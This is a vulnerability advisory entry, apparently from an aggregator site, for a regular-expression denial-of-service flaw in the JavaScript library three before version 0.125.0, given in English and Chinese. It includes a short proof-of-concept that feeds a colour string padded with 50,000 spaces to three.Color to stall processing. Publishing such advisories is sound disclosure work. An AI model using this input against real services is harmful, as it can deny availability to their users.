Vulnerability Information
Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.
Vulnerability Title
Regular Expression Denial of Service (ReDoS)
Vulnerability Description
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
CVSS Information
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Vulnerability Type
N/A
Vulnerability Title
Three 资源管理错误漏洞
Vulnerability Description
Mrdoob Three是美国Mrdoob个人开发者的一个应用软件。提供了创建一个场景,一个照相机和一个几何立方体,并将该立方体添加到场景中。 Three 中存在安全漏洞。该漏洞源于处理 rgb 和 hsl 颜色时会受到影响。 以下产品及版本受到影响: Three 0.125.0 之前版本
CVSS Information
N/A
Vulnerability Type
N/A